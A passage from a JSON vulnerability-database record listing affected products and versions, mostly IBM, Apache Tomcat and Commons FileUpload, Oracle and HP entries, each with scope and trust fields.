"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.0"
},
{
"model": "tivoli monitoring fp4",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "control center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.1"
},
{
"model": "case manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.1.5"
},
{
"model": "algo one algo risk application",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.45"
},
{
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"model": "web experience factory",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.2"
},
{
"model": "utilities work and asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.9.1.2.11"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.0"
},
{
"model": "tivoli monitoring fp6",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.2.4"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.34"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.9"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "jd814a hp a-imc enterprise edition software dvd media",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "commons fileupload",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "1.2.2"
},
{
"model": "mysql enterprise backup",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.10.1"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.48"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "web experience factory",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "infosphere metadata asset manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.5"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "sterling secure proxy",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.2"
},
{
"model": "forms server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.11"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.11"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.6.8003"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.10"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.0.2"
},
{
"model": "interact",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.0"
},
{
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"model": "jf378aae hp imc ent s/w pltfrm w/200-node e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.31"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.1.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.27"
},
{
"model": "tomcat 9.0.0.m1",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1.7"
},
{
"model": "spectrum control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.8"
},
{
"model": "jd808a hp imc ent platform w/100-node license",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.0.0"
},
{
"model": "rational directory server ifix9",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.1"
},
{
"model": "jd816a hp a-imc standard edition software dvd media",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.5"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.10"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.43"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "control center 6.1.0.0ifix02",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.3"
},
{
"model": "algo one algo risk application",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.9.1"
},
{
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2.3"
},
{
"model": "jg768aae hp pcm+ to imc std upg w/ 200-node e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.7"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.1.0"
},
{
"model": "forms server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.0.0.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.23"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.15"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.7"
},
{
"model": "jg660aae hp imc smart connect w/wlm vae e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.44"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.15"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.31"
},
{
"model": "web experience factory",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.01"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"model": "b2b advanced communications",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.0.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.14"
},
{
"model": "jd815a hp imc std platform w/100-node license",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "support assistant team server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0.1"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.2.3"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.24"
},
{
"model": "sterling secure proxy ifix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.2.04"
},
{
"model": "websphere dashboard framework",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.1"
},
{
"model": "bigfix remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2"
},
{
"model": "infosphere information server blueprint director",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.12"
},
{
"model": "sterling secure proxy ifix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.2.06"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"model": "web experience factory",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.1"
},
{
"model": "websphere application server liberty profil",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "control center ifix08",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.2.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.9"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.13"
},
{
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.11"
},
{
"model": "commons-fileupload library",
"scope": "eq",
"trust": 0.3,
"vendor": "jenkins ci",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.8"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.8"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.8"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1.0.0"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.7"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.6"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.6.1.0"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.6"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.4"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.8"
},
{
"model": "control center ifix01",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.0"
},
{
"model": "algo credit administrator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.9"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.0"
},
{
"model": "infosphere information server business glossary",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.3"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.2"
},
{
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "case manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.3"
},
{
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "bigfix remote control",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "control center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.0"
},
{
"model": "tomcat 8.0.0-rc3",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "tomcat 8.0.0-rc6",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.7"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.1"
},
{
"model": "sterling secure proxy ifix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.2.07"
},
{
"model": "interact",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "multi-enterprise integration gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"model": "infosphere qualitystage",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.3"
},
{
"model": "jf289aae hp enterprise management system to intelligent manageme",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.11"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.9"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.49"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1"
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3"
},
{
"model": "jf378a hp imc ent s/w platform w/200-node lic",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "case manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0.0"
},
{
"model": "tivoli monitoring fp5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.9"
},
{
"model": "tivoli monitoring fp9",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.0"
},
{
"model": "infosphere metadata asset manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.19"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.25"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.6.0.1"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.0"
},
{
"model": "mysql enterprise backup",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.10"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.7.1"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.1"
},
{
"model": "control center ifix05",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.2.1"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.0"
},
{
"model": "infosphere information server blueprint director",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "jg546aae hp imc basic sw platform w/50-node e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.6"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.5.7958"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.5"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.1"
},
{
"model": "tomcat",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.70"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2"
},
{
"model": "case manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0.4"
},
{
"model": "case manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.41"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.38"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.0.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.5.2.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.4"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.22"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.1"
},
{
"model": "spectrum control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.10"
},
{
"model": "tivoli storage manager for virtual environments",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2.1"
},
{
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"model": "atlas ediscovery process management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.3.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.1"
},
{
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.2"
},
{
"model": "algo one algo risk application",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"model": "control center ifix05",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.1"
},
{
"model": "communications service broker engineered system edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.3"
},
{
"model": "sterling secure proxy ifix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.4.2.08"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.4"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.4"
},
{
"model": "tomcat rc5",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "8.0.0"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.1182"
},
{
"model": "jd125a hp imc std s/w platform w/100-node",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "infosphere information server business glossary",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "algo credit manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0"
},
{
"model": "tomcat 9.0.0m8",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "multi-enterprise integration gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.0.1"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.4.7895"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.8"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.2"
},
{
"model": "marketing operations",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.02"
},
{
"model": "control center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.0"
},
{
"model": "algo one",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.0"
},
{
"model": "jg549aae hp pcm+ to imc std upgr w/200-node e-ltu",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "0"
},
{
"model": "enterprise content management system monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.6"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.32"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0.1.0"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.9"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "infosphere qualitystage",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"model": "mysql enterprise backup",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.12.2"
},
{
"model": "tivoli monitoring fp7",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "mysql enterprise monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.3.2.1162"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.1"
},
{
"model": "commons fileupload",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "1.2.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.16"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.39"
},
{
"model": "enterprise content management system monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "tomcat 9.0.0.m2",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "infosphere metadata asset manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "b2b advanced communications 1.0.0.5 1",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "algo credit limits",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.7.0"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.2"
},
{
"model": "support assistant team server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"model": "websphere message broker",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"model": "bluemix liberty for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.9"
},
{
"model": "b2b advanced communications",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.0.5"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.2"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1"
},
{
"model": "disposal and governance management for it",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.3.3"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2.4"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.37"
},
{
"model": "tomcat",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "7.0.13"
},
{
"model": "infosphere information governance catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.5"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.1.1"
},
{
"model": "solaris sru11.6",
"scope": "ne",
"trust": 0.3,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "tomcat 9.0.0m6",
"scope": null,
"trust": 0.3,
"vendor": "apache",
"version": null
},
{
"model": "websphere application server hypervisor edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "0"
},
{
